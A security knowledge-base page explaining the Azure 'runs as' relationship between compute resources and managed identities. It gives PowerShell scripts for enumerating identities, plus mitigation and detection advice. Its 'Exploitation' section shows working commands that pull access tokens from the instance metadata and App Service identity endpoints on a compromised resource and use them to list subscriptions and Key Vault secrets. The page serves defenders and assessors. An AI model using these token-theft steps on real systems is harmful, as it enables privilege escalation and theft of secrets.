AZ_RUNS_AS

Summary

FSProtect ACL Alias

AZ_RUNS_AS

Entra ID (Azure AD) Alias

Runs As Identity

Affected Object Types

Virtual Machines, App Services, Function Apps, Logic Apps, Automation Accounts, Container Instances, Azure Kubernetes Service

Exploitation Certainty

Certain

Description

AZ_RUNS_AS represents the relationship where an Azure resource executes code or performs actions using a specific identity. This edge shows that Resource X runs as Identity Y, meaning the resource can authenticate and access other Azure resources using that identity's permissions.

This relationship is critical for understanding privilege escalation paths because:

Managed Identities: Virtual Machines, App Services, Function Apps, and other compute resources can have system-assigned or user-assigned managed identities that grant them access to Azure resources.
Automation Run As Accounts: Azure Automation accounts use Run As accounts (service principals) to authenticate when executing runbooks.
Service Principal Credentials: Applications and services may run using service principal credentials stored in configuration.

An attacker who compromises a resource with AZ_RUNS_AS can leverage the associated identity to:

Access Azure Key Vault secrets, certificates, and keys.
Read/write to Azure Storage accounts.
Manage Azure resources (VMs, databases, etc.).
Access Microsoft Graph API with the identity's permissions.
Pivot to other resources accessible by the identity.

Identification

Get Virtual Machines with Managed Identities

Get VM managed identities (PowerShell)

Connect-AzAccount

$vms = Get-AzVM
$results = @()

foreach ($vm in $vms) {
    $vmDetails = Get-AzVM -ResourceGroupName $vm.ResourceGroupName -Name $vm.Name
    
    if ($vmDetails.Identity) {
        # System-assigned identity
        if ($vmDetails.Identity.Type -match "SystemAssigned") {
            $results += [PSCustomObject]@{
                ResourceType     = "VirtualMachine"
                ResourceName     = $vm.Name
                ResourceGroup    = $vm.ResourceGroupName
                IdentityType     = "SystemAssigned"
                PrincipalId      = $vmDetails.Identity.PrincipalId
                TenantId         = $vmDetails.Identity.TenantId
            }
        }
        
        # User-assigned identities
        if ($vmDetails.Identity.UserAssignedIdentities) {
            foreach ($uai in $vmDetails.Identity.UserAssignedIdentities.Keys) {
                $uaiDetails = $vmDetails.Identity.UserAssignedIdentities[$uai]
                $results += [PSCustomObject]@{
                    ResourceType     = "VirtualMachine"
                    ResourceName     = $vm.Name
                    ResourceGroup    = $vm.ResourceGroupName
                    IdentityType     = "UserAssigned"
                    PrincipalId      = $uaiDetails.PrincipalId
                    IdentityResource = $uai
                }
            }
        }
    }
}

$results | Export-Csv -Path ".\VM_ManagedIdentities.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get App Services with Managed Identities

Get App Service managed identities (PowerShell)

Connect-AzAccount

$webApps = Get-AzWebApp
$results = @()

foreach ($app in $webApps) {
    if ($app.Identity) {
        # System-assigned identity
        if ($app.Identity.Type -match "SystemAssigned") {
            $results += [PSCustomObject]@{
                ResourceType     = "AppService"
                ResourceName     = $app.Name
                ResourceGroup    = $app.ResourceGroup
                IdentityType     = "SystemAssigned"
                PrincipalId      = $app.Identity.PrincipalId
                TenantId         = $app.Identity.TenantId
            }
        }
        
        # User-assigned identities
        if ($app.Identity.UserAssignedIdentities) {
            foreach ($uai in $app.Identity.UserAssignedIdentities.Keys) {
                $uaiDetails = $app.Identity.UserAssignedIdentities[$uai]
                $results += [PSCustomObject]@{
                    ResourceType     = "AppService"
                    ResourceName     = $app.Name
                    ResourceGroup    = $app.ResourceGroup
                    IdentityType     = "UserAssigned"
                    PrincipalId      = $uaiDetails.PrincipalId
                    IdentityResource = $uai
                }
            }
        }
    }
}

$results | Export-Csv -Path ".\AppService_ManagedIdentities.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get Function Apps with Managed Identities

Get Function App managed identities (PowerShell)

Connect-AzAccount

$functionApps = Get-AzFunctionApp
$results = @()

foreach ($app in $functionApps) {
    if ($app.IdentityType) {
        $results += [PSCustomObject]@{
            ResourceType     = "FunctionApp"
            ResourceName     = $app.Name
            ResourceGroup    = $app.ResourceGroup
            IdentityType     = $app.IdentityType
            PrincipalId      = $app.IdentityPrincipalId
            TenantId         = $app.IdentityTenantId
        }
    }
}

$results | Export-Csv -Path ".\FunctionApp_ManagedIdentities.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get Automation Account Run As Accounts

Get Automation Account Run As accounts (PowerShell)

Connect-AzAccount

$automationAccounts = Get-AzAutomationAccount
$results = @()

foreach ($account in $automationAccounts) {
    # Get Run As connection
    $connections = Get-AzAutomationConnection -ResourceGroupName $account.ResourceGroupName -AutomationAccountName $account.AutomationAccountName
    
    foreach ($conn in $connections) {
        if ($conn.ConnectionTypeName -eq "AzureServicePrincipal") {
            $results += [PSCustomObject]@{
                ResourceType          = "AutomationAccount"
                AutomationAccountName = $account.AutomationAccountName
                ResourceGroup         = $account.ResourceGroupName
                ConnectionName        = $conn.Name
                ConnectionType        = $conn.ConnectionTypeName
                ApplicationId         = $conn.FieldDefinitionValues.ApplicationId
                TenantId              = $conn.FieldDefinitionValues.TenantId
                SubscriptionId        = $conn.FieldDefinitionValues.SubscriptionId
            }
        }
    }
    
    # Check for managed identity
    $uri = "https://management.azure.com/subscriptions/$((Get-AzContext).Subscription.Id)/resourceGroups/$($account.ResourceGroupName)/providers/Microsoft.Automation/automationAccounts/$($account.AutomationAccountName)?api-version=2021-06-22"
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    
    if ($data.identity) {
        $results += [PSCustomObject]@{
            ResourceType          = "AutomationAccount"
            AutomationAccountName = $account.AutomationAccountName
            ResourceGroup         = $account.ResourceGroupName
            ConnectionName        = "ManagedIdentity"
            ConnectionType        = $data.identity.type
            ApplicationId         = $data.identity.principalId
            TenantId              = $data.identity.tenantId
            SubscriptionId        = (Get-AzContext).Subscription.Id
        }
    }
}

$results | Export-Csv -Path ".\AutomationAccount_RunAs.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Get All Resources with Managed Identities

Get all resources with managed identities (PowerShell)

Connect-AzAccount

$results = @()

# Query all resources with identity
$resources = Get-AzResource | Where-Object { $_.Identity -ne $null }

foreach ($resource in $resources) {
    if ($resource.Identity.Type -match "SystemAssigned") {
        $results += [PSCustomObject]@{
            ResourceType     = $resource.ResourceType
            ResourceName     = $resource.Name
            ResourceGroup    = $resource.ResourceGroupName
            IdentityType     = "SystemAssigned"
            PrincipalId      = $resource.Identity.PrincipalId
            TenantId         = $resource.Identity.TenantId
        }
    }
    
    if ($resource.Identity.UserAssignedIdentities) {
        foreach ($uai in $resource.Identity.UserAssignedIdentities.Keys) {
            $uaiDetails = $resource.Identity.UserAssignedIdentities[$uai]
            $results += [PSCustomObject]@{
                ResourceType     = $resource.ResourceType
                ResourceName     = $resource.Name
                ResourceGroup    = $resource.ResourceGroupName
                IdentityType     = "UserAssigned"
                PrincipalId      = $uaiDetails.PrincipalId
                IdentityResource = $uai
            }
        }
    }
}

$results | Export-Csv -Path ".\AllResources_ManagedIdentities.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

If you have access to a resource that runs as a managed identity or service principal, you can leverage that identity to access other Azure resources.

From a Compromised Virtual Machine

Use IMDS from a compromised VM (PowerShell)

# Query the Instance Metadata Service (IMDS) to get an access token
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -Headers @{Metadata="true"}
$accessToken = $response.access_token

# Use the token to query Azure Resource Manager
$headers = @{Authorization = "Bearer $accessToken"}
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers $headers

From a Compromised App Service / Function App

Use managed identity from App Service / Function App (PowerShell)

# Get access token using managed identity
$resourceUri = "https://management.azure.com/"
$tokenEndpoint = $env:IDENTITY_ENDPOINT
$tokenHeader = $env:IDENTITY_HEADER

$response = Invoke-RestMethod -Uri "$tokenEndpoint?resource=$resourceUri&api-version=2019-08-01" -Headers @{"X-IDENTITY-HEADER"=$tokenHeader}
$accessToken = $response.access_token

# Use the token
$headers = @{Authorization = "Bearer $accessToken"}
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers $headers

Access Key Vault Using Managed Identity

Access Key Vault using managed identity (PowerShell)

# Get token for Key Vault
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" -Headers @{Metadata="true"}
$accessToken = $response.access_token

# List secrets
$vaultName = "target-keyvault"
$headers = @{Authorization = "Bearer $accessToken"}
Invoke-RestMethod -Uri "https://$vaultName.vault.azure.net/secrets?api-version=7.3" -Headers $headers

Mitigation

Apply least-privilege RBAC: Only grant managed identities the minimum permissions required.
Use User-Assigned Managed Identities: Prefer user-assigned over system-assigned identities for better control and auditability.
Regular access reviews: Periodically review what permissions managed identities have.
Network restrictions: Limit where managed identities can be used (e.g., restrict Key Vault access to specific VNets).
Disable unnecessary identities: Remove managed identities from resources that don't need them.
Monitor identity usage: Enable diagnostic logging on resources to track managed identity usage.

Detection

Monitor for suspicious use of managed identities:

Log Source

Event/Signal

Description

Azure Activity Log

Resource access from unexpected sources

Managed identity used outside normal patterns

Microsoft Entra Sign-in Logs

Service principal sign-ins

Filter by managed identity application IDs

Key Vault Diagnostic Logs

SecretGet, KeyGet operations

Track what secrets are being accessed

Azure Monitor

Unusual API calls

Detect reconnaissance or privilege escalation

Query managed identity sign-ins (PowerShell)

Connect-AzAccount

# Get managed identity sign-ins from the last 7 days
$startDate = (Get-Date).AddDays(-7).ToString("yyyy-MM-ddTHH:mm:ssZ")
$uri = "https://graph.microsoft.com/v1.0/auditLogs/signIns?`$filter=signInEventTypes/any(t: t eq 'managedIdentity') and createdDateTime ge $startDate"

$response = Invoke-AzRestMethod -Uri $uri -Method GET
$data = $response.Content | ConvertFrom-Json

$data.value | Select-Object createdDateTime, appDisplayName, resourceDisplayName, ipAddress, status | Format-Table -AutoSize

References

https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/overview
https://learn.microsoft.com/en-us/azure/automation/automation-security-overview
https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity
https://learn.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/how-to-use-vm-token
https://learn.microsoft.com/en-us/azure/key-vault/general/managed-identity

PreviousAZ_RESET_PASSWORD NextAZ_SECURITY_ADMIN

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagGet Virtual Machines with Managed Identities

hashtagGet App Services with Managed Identities

hashtagGet Function Apps with Managed Identities

hashtagGet Automation Account Run As Accounts

hashtagGet All Resources with Managed Identities

hashtagExploitation

hashtagFrom a Compromised Virtual Machine

hashtagFrom a Compromised App Service / Function App

hashtagAccess Key Vault Using Managed Identity

hashtagMitigation

hashtagDetection

hashtagQuery Sign-in Logs for Managed Identity Usage

hashtagReferences

Summary

Description

Identification

Get Virtual Machines with Managed Identities

Get App Services with Managed Identities

Get Function Apps with Managed Identities

Get Automation Account Run As Accounts

Get All Resources with Managed Identities

Exploitation

From a Compromised Virtual Machine

From a Compromised App Service / Function App

Access Key Vault Using Managed Identity

Mitigation

Detection

Query Sign-in Logs for Managed Identity Usage

References